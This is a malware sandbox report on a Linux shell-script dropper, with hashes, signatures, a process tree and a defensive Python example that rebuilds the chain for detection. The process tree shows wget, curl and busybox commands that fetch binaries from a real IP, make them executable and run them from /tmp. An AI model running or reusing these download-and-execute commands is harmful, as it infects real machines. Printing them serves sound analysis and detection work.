Analysis
- max time kernel: 16s
- max time network: 43s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 24/11/2024, 01:07
Static task
- static1

Behavioral tasks (same sample, d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh, on four platforms)
- behavioral1: ubuntu1804-amd64-20240508-en
- behavioral2: debian9-armhf-20240611-en (the run this report describes)
- behavioral3: debian9-mipsbe-20240611-en
- behavioral4: debian9-mipsel-20240611-en
General
- Target: d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
- Size: 10KB
- MD5: 26f371cd3359d8f6a45ccc544288c804
- SHA1: 35bd60ad220991f844f9862e522418bc05563390
- SHA256: d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce
- SHA512: 2729bf8db10105d916290630952e3067a9f8f09aa7ae41abbe4ba4b44d26b55872829cbe0a605d526abae197a6dafb93ee254f30ac20bf7ce04bea8b41cb3ef0
- SSDEEP: 192:k47/XwgW6ozLldOY4Z6zJnzLldOYZM7/Xwg+w:kN5zLlcY4Z6zJnzLlcY3w
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 7 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Here every dropped payload is made world-readable, -writable and -executable (chmod 777) immediately before it is run; the target column is taken from the process tree below.
  pid  Process  target
  715  chmod    wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
  739  chmod    F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
  758  chmod    BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
  778  chmod    vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
  800  chmod    93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
  806  chmod    iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
  812  chmod    Lo46YywIia327erXTugKxcchWtLwMJPGmT
-
Executes dropped EXE 7 IoCs
  ioc                                        pid  Process
  /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy    716  wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
  /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4    742  F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
  /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat    759  BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
  /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c    779  vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
  /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E    801  93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
  /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y    807  iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
  /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT    813  Lo46YywIia327erXTugKxcchWtLwMJPGmT
-
Checks CPU configuration 1 TTPs 7 IoCs
Checks CPU information which indicates whether the system is a virtual machine.
  description              ioc            Process
  File opened for reading  /proc/cpuinfo  curl  (7 times, once per curl invocation)
-
Reads runtime system information 14 IoCs (signature name as tagged on the curl processes in the process tree below)
  description              ioc                            Process
  File opened for reading  /proc/self/auxv                curl  (7 times)
  File opened for reading  /proc/sys/crypto/fips_enabled  curl  (7 times)
Both this signature and "Checks CPU configuration" are attributed to curl, not to the script or to any of the dropped binaries, so they record the downloader's own behaviour and are weak evidence of deliberate VM detection by the sample. The behaviour that matters in this report is the download, chmod 777, execute, delete chain in the process tree.
-
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
  description                   ioc                                        Process
  File opened for modification  /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y    curl
  File opened for modification  /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT    curl
  File opened for modification  /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy    curl
  File opened for modification  /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4    curl
  File opened for modification  /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat    curl
  File opened for modification  /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c    curl
  File opened for modification  /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E    curl
Processes
The tree records the same six-step sequence for each of seven payload names: three download attempts (wget, curl -O, /bin/busybox wget) against http://216.126.231.240/bins/, then chmod 777, execution from /tmp, and deletion of the file. An eighth download (TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0, PID 815) is the last recorded process; no chmod or execution of it appears before the run ended (max time kernel 16s). The script deletes bins.sh in its working directory before the first download.

- /tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh (PID 668): /tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
  - /bin/rm (PID 670): rm bins.sh
  - /usr/bin/wget (PID 672): wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
  - /usr/bin/curl (PID 697): curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
      Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 709): /bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
  - /bin/chmod (PID 715): chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
      File and Directory Permissions Modification
  - /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy (PID 716): ./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
      Executes dropped EXE
  - /bin/rm (PID 717): rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
  - /usr/bin/wget (PID 719): wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
  - /usr/bin/curl (PID 726): curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
      Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 733): /bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
  - /bin/chmod (PID 739): chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
      File and Directory Permissions Modification
  - /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 (PID 742): ./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
      Executes dropped EXE
  - /bin/rm (PID 745): rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
  - /usr/bin/wget (PID 746): wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
  - /usr/bin/curl (PID 754): curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
      Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 757): /bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
  - /bin/chmod (PID 758): chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
      File and Directory Permissions Modification
  - /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat (PID 759): ./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
      Executes dropped EXE
  - /bin/rm (PID 760): rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
  - /usr/bin/wget (PID 761): wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
  - /usr/bin/curl (PID 763): curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
      Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 772): /bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
  - /bin/chmod (PID 778): chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
      File and Directory Permissions Modification
  - /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c (PID 779): ./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
      Executes dropped EXE
  - /bin/rm (PID 780): rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
  - /usr/bin/wget (PID 782): wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
  - /usr/bin/curl (PID 788): curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
      Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 796): /bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
  - /bin/chmod (PID 800): chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
      File and Directory Permissions Modification
  - /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E (PID 801): ./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
      Executes dropped EXE
  - /bin/rm (PID 802): rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
  - /usr/bin/wget (PID 803): wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
  - /usr/bin/curl (PID 804): curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
      Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 805): /bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
  - /bin/chmod (PID 806): chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
      File and Directory Permissions Modification
  - /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y (PID 807): ./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
      Executes dropped EXE
  - /bin/rm (PID 808): rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
  - /usr/bin/wget (PID 809): wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT
  - /usr/bin/curl (PID 810): curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT
      Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 811): /bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT
  - /bin/chmod (PID 812): chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT
      File and Directory Permissions Modification
  - /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT (PID 813): ./Lo46YywIia327erXTugKxcchWtLwMJPGmT
      Executes dropped EXE
  - /bin/rm (PID 814): rm Lo46YywIia327erXTugKxcchWtLwMJPGmT
  - /usr/bin/wget (PID 815): wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0
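The chain above is what a detection should key on, not the curl signatures. The following Python is an added example, not part of the sandbox report: it reconstructs the per-payload download, chmod 777, execute, delete chain from a list of (pid, executable, command line) process events, flags chains that reached execution, and extracts the host, URL and dropped-file indicators. The event list is constructed from this report's process tree (the first two payload chains plus the unfinished trailing wget, PID 815); the classification heuristics in classify() are this example's own, not the sandbox's signature logic.

```python
"""Reconstruct the dropper chain seen in the sandbox process tree.

For every payload name N the script in this report runs:
    wget URL/N ; curl -O URL/N ; /bin/busybox wget URL/N ; chmod 777 N ; ./N ; rm N
Given process events as (pid, executable, command line) in spawn order, this
groups them per payload name, marks chains that reached execution, and pulls
out network and file indicators. classify() is this example's own heuristic.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://\S+")
DROP_DIR = "/tmp"

# Constructed sample events copied from the report's process tree: the first
# two payload chains plus the trailing download (PID 815) that never got run.
SAMPLE = "d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh"
BASE = "http://216.126.231.240/bins/"
P1 = "wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy"
P2 = "F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4"
P3 = "TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0"
EVENTS = [
    (668, f"{DROP_DIR}/{SAMPLE}", f"{DROP_DIR}/{SAMPLE}"),
    (670, "/bin/rm", "rm bins.sh"),
    (672, "/usr/bin/wget", f"wget {BASE}{P1}"),
    (697, "/usr/bin/curl", f"curl -O {BASE}{P1}"),
    (709, "/bin/busybox", f"/bin/busybox wget {BASE}{P1}"),
    (715, "/bin/chmod", f"chmod 777 {P1}"),
    (716, f"{DROP_DIR}/{P1}", f"./{P1}"),
    (717, "/bin/rm", f"rm {P1}"),
    (719, "/usr/bin/wget", f"wget {BASE}{P2}"),
    (726, "/usr/bin/curl", f"curl -O {BASE}{P2}"),
    (733, "/bin/busybox", f"/bin/busybox wget {BASE}{P2}"),
    (739, "/bin/chmod", f"chmod 777 {P2}"),
    (742, f"{DROP_DIR}/{P2}", f"./{P2}"),
    (745, "/bin/rm", f"rm {P2}"),
    (815, "/usr/bin/wget", f"wget {BASE}{P3}"),
]


def classify(exe, cmdline):
    """Map one process event to (kind, payload_name, url), or None if unrelated."""
    argv = cmdline.split()
    if not argv:
        return None
    tool = exe.rsplit("/", 1)[-1]
    url = URL_RE.search(cmdline)
    # Three download tools are tried per payload; busybox appears as
    # /bin/busybox with "wget" as its applet argument.
    if url and (tool in ("wget", "curl") or (tool == "busybox" and "wget" in argv)):
        return ("download", url.group(0).rsplit("/", 1)[-1], url.group(0))
    if tool == "chmod" and len(argv) >= 3 and argv[1] == "777":
        return ("chmod", argv[-1], None)
    if tool == "rm" and len(argv) >= 2:
        return ("rm", argv[-1], None)
    # A dropped binary is executed from the drop directory as ./NAME.
    if exe.startswith(DROP_DIR + "/") and argv[0].startswith("./"):
        return ("exec", argv[0][2:], None)
    return None


def find_dropper_chains(events):
    """Group events by payload name; return the chains that include a download."""
    chains = {}
    for pid, exe, cmdline in events:
        hit = classify(exe, cmdline)
        if hit is None:
            continue
        kind, name, url = hit
        c = chains.setdefault(name, {"name": name, "urls": [], "download_pids": [],
                                     "chmod_pid": None, "exec_pid": None, "rm_pid": None})
        if kind == "download":
            c["download_pids"].append(pid)
            if url not in c["urls"]:
                c["urls"].append(url)
        else:
            c[kind + "_pid"] = pid
    result = []
    for c in chains.values():
        if not c["urls"]:
            continue  # e.g. the initial "rm bins.sh": no download, so not a chain
        # Complete once the payload was made executable and actually run; the
        # trailing wget in the report never gets that far.
        c["complete"] = c["chmod_pid"] is not None and c["exec_pid"] is not None
        result.append(c)
    return result


def extract_iocs(chains):
    """Network and host indicators across all chains, sorted for stable output."""
    urls = sorted({u for c in chains for u in c["urls"]})
    hosts = sorted({urlparse(u).hostname for u in urls})
    executed = sorted(f"{DROP_DIR}/{c['name']}" for c in chains if c["exec_pid"] is not None)
    return {"hosts": hosts, "urls": urls, "executed": executed}


if __name__ == "__main__":
    found = find_dropper_chains(EVENTS)
    for c in found:
        state = "executed" if c["complete"] else "download only"
        print(f"{c['name']}: {state}, downloads {c['download_pids']}, "
              f"chmod {c['chmod_pid']}, exec {c['exec_pid']}, rm {c['rm_pid']}")
    print(extract_iocs(found))
```

On the constructed events this reports the first two payloads as executed (chmod and exec PIDs 715/716 and 739/742) and the third as download only, with a single host, 216.126.231.240, across all URLs. Feeding it real process telemetry (auditd execve records, eBPF exec events) needs only the (pid, exe, cmdline) tuples; the rm step is tracked so that a fully completed chain also explains why the payload is no longer on disk for forensics.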
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97